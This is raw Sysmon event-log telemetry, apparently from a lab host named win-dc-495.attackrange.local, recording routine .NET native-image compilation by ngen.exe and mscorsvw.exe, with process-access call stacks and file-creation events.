13:46:07.750{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-911F-6005-A501-00000000A301}2352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:07.562{59A5CD1D-911B-6005-A401-00000000A301}4584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\11e8-0\Microsoft.Build.dll2021-01-18 13:46:07.562 10341000x80000000000000005902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:08.125{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9120-6005-A801-00000000A301}2492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:08.109{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9120-6005-A801-00000000A301}2492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:08.109{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9120-6005-A801-00000000A301}2492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:08.062{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9120-6005-A701-00000000A301}4692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:08.047{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9120-6005-A701-00000000A301}4692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:08.047{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9120-6005-A701-00000000A301}4692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:09.922{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9121-6005-AB01-00000000A301}4696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:09.906{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9121-6005-AB01-00000000A301}4696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:09.906{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9121-6005-AB01-00000000A301}4696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:09.844{59A5CD1D-9121-6005-AA01-00000000A301}2708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\a94-0\Microsoft.Build.Framework.dll2021-01-18 13:46:09.844 10341000x80000000000000005909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:09.562{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9121-6005-AA01-00000000A301}2708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:09.547{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9121-6005-AA01-00000000A301}2708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:09.547{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9121-6005-AA01-00000000A301}2708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:09.515{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9121-6005-A901-00000000A301}3804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:09.500{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9121-6005-A901-00000000A301}3804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:09.500{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9121-6005-A901-00000000A301}3804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:09.406{59A5CD1D-9120-6005-A801-00000000A301}2492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\9bc-0\Microsoft.Build.Engine.dll2021-01-18 13:46:09.406 10341000x80000000000000005916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:10.094{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9122-6005-AC01-00000000A301}4512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:10.094{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9122-6005-AC01-00000000A301}4512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:10.094{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9122-6005-AC01-00000000A301}4512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:12.734{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9124-6005-AE01-00000000A301}4732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:12.734{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9124-6005-AE01-00000000A301}4732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:12.734{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9124-6005-AE01-00000000A301}4732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:12.672{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9124-6005-AD01-00000000A301}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:12.672{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9124-6005-AD01-00000000A301}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 